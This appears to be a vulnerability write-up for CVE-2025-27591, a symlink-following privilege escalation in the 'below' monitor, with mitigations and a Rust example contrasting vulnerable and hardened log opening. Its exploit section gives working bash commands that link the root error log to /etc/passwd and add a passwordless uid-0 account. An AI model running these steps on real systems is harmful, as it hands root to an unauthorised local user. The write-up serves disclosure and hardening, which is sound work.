### CVE-2025-27591 - Privilege Escalation via Insecure Log Handling
#### Overview
CVE-2025-27591 is a **local privilege escalation vulnerability** in the `below` resource monitor (versions before the upstream fix in 0.9.0) caused by **insecure symbolic link handling** in its logging code. A local user who can replace entries in the log directory and cause `below` to run as root (for example through a `sudo` rule) can make it write attacker-controlled content into an arbitrary file, such as `/etc/passwd`, and thereby obtain root.
#### Vulnerability Details
`below` opens its error log under `/var/log/below/` with a plain open that follows symbolic links and never verifies what the resulting file actually is. Because an unprivileged user can remove and recreate entries in that directory, the attacker replaces the expected log file (`error_root.log` in the PoC) with a symlink to a sensitive file such as `/etc/passwd`. When `below` is then run as root (via `sudo` in this PoC), it opens and operates on the symlink target with root privileges instead of on a log file it owns, and the attacker's content lands in `/etc/passwd`.
#### Exploit Demonstration
```bash
# Confirm the log directory exists and note its permissions: the PoC relies on
# an unprivileged user being able to replace entries inside it
test -d /var/log/below && ls -ld /var/log/below
# Remove the existing root error log and replace it with a symlink to /etc/passwd
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Prepare a passwd entry for a new uid-0 account with an empty password field
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Trigger the vulnerable log open as root: below follows the symlink and
# operates on /etc/passwd instead of its own log file
sudo /usr/bin/below record
# The PoC appends as the unprivileged user, which only succeeds if the root run
# above left the symlink target writable; check the mode before relying on it
ls -l /etc/passwd
cat /tmp/attacker >> /var/log/below/error_root.log
# Switch to the newly created uid-0 account
su attacker
```
#### Impact
Successful exploitation grants **root privileges** to a local, unprivileged attacker. Any file root can write is reachable through the symlink, so `/etc/passwd` is only the most direct target; the same primitive can also destroy files (for example by truncating them) and lead to full system compromise.
#### Mitigation
- Upgrade to a fixed release of `below` (0.9.0 or later).
- Make `/var/log/below/` owned by root and not writable by other users (for example mode `0755`), and remove any symlinks already present in it.
- In the logging code, do not validate the path and then open it (that is a TOCTOU race); open the log with `O_NOFOLLOW`, then `fstat` the descriptor and refuse to write unless it is a regular file owned by the expected user.
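The following is an added example, written for this page and not code from the `below` project, contrasting the open pattern the PoC abuses with a hardened version of the last mitigation bullet. The `O_NOFOLLOW` and `O_CLOEXEC` values are the generic Linux constants (an assumption; they differ on alpha and sparc), hardcoded so the example needs no external crate, and the `expected_uid` parameter, the function names and the temporary paths used in `main` are illustrative choices, not anything from the project.

```rust
use std::fs::{File, OpenOptions};
use std::io::{self, Write};
use std::os::unix::fs::{MetadataExt, OpenOptionsExt};
use std::path::Path;

// Generic Linux values (assumption: not alpha/sparc, where O_NOFOLLOW differs).
const O_NOFOLLOW: i32 = 0o400000;
const O_CLOEXEC: i32 = 0o2000000;

/// The pattern the PoC abuses: create-or-append with default flags.
/// open(2) follows a symlink in the final path component, so a process
/// running as root ends up writing into whatever the attacker linked.
pub fn open_log_vulnerable(path: &Path) -> io::Result<File> {
    OpenOptions::new().create(true).append(true).open(path)
}

/// Hardened variant: refuse to follow a symlink in the final component,
/// then check the descriptor we actually got (fstat, no second path lookup)
/// instead of "validating" the path before the open, which would be racy.
pub fn open_log_hardened(path: &Path, expected_uid: u32) -> io::Result<File> {
    let file = OpenOptions::new()
        .create(true)
        .append(true)
        .mode(0o600) // a fresh log is private to its owner, not world-writable
        .custom_flags(O_NOFOLLOW | O_CLOEXEC)
        .open(path)?; // ELOOP if `path` itself is a symlink
    let md = file.metadata()?;
    if !md.file_type().is_file() {
        return Err(io::Error::new(io::ErrorKind::Other, "log path is not a regular file"));
    }
    if md.uid() != expected_uid {
        return Err(io::Error::new(io::ErrorKind::Other, "log file owned by unexpected uid"));
    }
    // A hard link to a sensitive file would also redirect our writes.
    if md.nlink() != 1 {
        return Err(io::Error::new(io::ErrorKind::Other, "log file has extra hard links"));
    }
    Ok(file)
}

/// Append one line to an already-validated log descriptor.
pub fn append_line(file: &mut File, line: &str) -> io::Result<()> {
    file.write_all(line.as_bytes())?;
    file.write_all(b"\n")
}

fn main() -> io::Result<()> {
    // Constructed demo layout under the temp dir: a "sensitive" target file and
    // an error_root.log symlink pointing at it, as in the PoC.
    let dir = std::env::temp_dir().join(format!("below_demo_{}", std::process::id()));
    std::fs::create_dir_all(&dir)?;
    let target = dir.join("sensitive.txt");
    std::fs::write(&target, "original\n")?;
    let link = dir.join("error_root.log");
    std::os::unix::fs::symlink(&target, &link)?;
    let uid = std::fs::metadata(&dir)?.uid();

    let mut v = open_log_vulnerable(&link)?;
    append_line(&mut v, "injected via symlink")?;
    println!("vulnerable open wrote into target: {:?}", std::fs::read_to_string(&target)?);
    println!("hardened open of symlink: {:?}", open_log_hardened(&link, uid).map(|_| ()));

    std::fs::remove_dir_all(&dir)
}
```

`O_NOFOLLOW` only covers the final path component, so the directory itself still has to be trusted: either keep `/var/log/below/` root-owned and not writable by others, or open the log with `openat` relative to a directory descriptor you have already validated.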